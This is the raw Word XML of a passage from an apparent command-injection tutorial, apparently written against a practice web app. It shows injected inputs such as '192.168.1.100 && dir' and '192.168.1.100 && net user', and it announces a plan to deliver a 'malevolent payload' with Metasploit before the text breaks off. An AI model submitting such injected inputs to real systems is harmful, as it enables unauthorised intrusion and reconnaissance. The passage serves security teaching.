          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="720EE82F" wp14:editId="387D29E8">
            <wp:extent cx="5731510" cy="3339465"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="196238326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339465"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5238E9C1" w14:textId="77777777" w:rsidR="00F12781" w:rsidRPr="00F12781" w:rsidRDefault="00F12781" w:rsidP="00F12781">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Go to the command execution page Enter an IP address and click on submit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6C7A9C" w14:textId="603A2065" w:rsidR="00F12781" w:rsidRPr="00F12781" w:rsidRDefault="00F12781" w:rsidP="00F12781">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="40EE3861" wp14:editId="1766DD07">
            <wp:extent cx="4429125" cy="1371600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="36850220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29125" cy="1371600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A8A949" w14:textId="77777777" w:rsidR="00F12781" w:rsidRPr="00F12781" w:rsidRDefault="00F12781" w:rsidP="00F12781">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">Now you can see the reply that tells us that we have establish a connection with the server. I have tried this numerous times just to be sure and so can you, therefore, whenever you will execute this </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>cammand</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> you will see the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>following :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="19731DAE" w14:textId="4D0A3933" w:rsidR="00F12781" w:rsidRPr="00F12781" w:rsidRDefault="00F12781" w:rsidP="00F12781">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0DF5AAE5" wp14:editId="3F12BDDA">
            <wp:extent cx="5731510" cy="3573145"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="8149693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573145"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="70464C9D" w14:textId="77777777" w:rsidR="00F12781" w:rsidRPr="00F12781" w:rsidRDefault="00F12781" w:rsidP="00F12781">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>We can also implement multiple commands simultaneously just by using </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>&amp; </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">sign. For example next command </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>is :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="53F609E9" w14:textId="77777777" w:rsidR="00F12781" w:rsidRPr="00F12781" w:rsidRDefault="00F12781" w:rsidP="00F12781">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F7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95" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.1.100 &amp;&amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="20E7189F" w14:textId="77777777" w:rsidR="00F12781" w:rsidRPr="00F12781" w:rsidRDefault="00F12781" w:rsidP="00F12781">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>After the above command click on </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>submit,</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t> performing the said command will itemize all directories and files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA85198" w14:textId="27BCC76E" w:rsidR="00F12781" w:rsidRPr="00F12781" w:rsidRDefault="00F12781" w:rsidP="00F12781">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="24A9DBE0" wp14:editId="523DCBB5">
            <wp:extent cx="4562475" cy="1304925"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="175750104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62475" cy="1304925"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="404F1926" w14:textId="77777777" w:rsidR="00F12781" w:rsidRPr="00F12781" w:rsidRDefault="00F12781" w:rsidP="00F12781">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>We have found 4 directories and a file and also that path of the directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358493FB" w14:textId="0ABF6FB2" w:rsidR="00F12781" w:rsidRPr="00F12781" w:rsidRDefault="00F12781" w:rsidP="00F12781">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2364DB32" wp14:editId="640E116D">
            <wp:extent cx="5731510" cy="4849495"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="582146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849495"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2DE178" w14:textId="77777777" w:rsidR="00F12781" w:rsidRPr="00F12781" w:rsidRDefault="00F12781" w:rsidP="00F12781">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Next command is </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>192.168.1.100 &amp;&amp; net user </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>click on </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>submit, </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>this command will show the user’s list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2F97E8" w14:textId="174ADBCF" w:rsidR="00F12781" w:rsidRPr="00F12781" w:rsidRDefault="00F12781" w:rsidP="00F12781">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F39D731" wp14:editId="6D7E09CC">
            <wp:extent cx="4438650" cy="1362075"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="210694656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38650" cy="1362075"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E3548D" w14:textId="1B7A2054" w:rsidR="00F12781" w:rsidRPr="00F12781" w:rsidRDefault="00F12781" w:rsidP="00F12781">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="19015E53" wp14:editId="03DEF56E">
            <wp:extent cx="5731510" cy="3404870"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="11558610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404870"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2FAB0C" w14:textId="77777777" w:rsidR="00F12781" w:rsidRPr="00F12781" w:rsidRDefault="00F12781" w:rsidP="00F12781">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">Various commands are available which when submitted will give the intended outcome. So firstly, we will find a way to transfer our malevolent payload to the remote machine and for that I am using my </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>favorite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> tool </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">. To use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> al you have to do is type</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
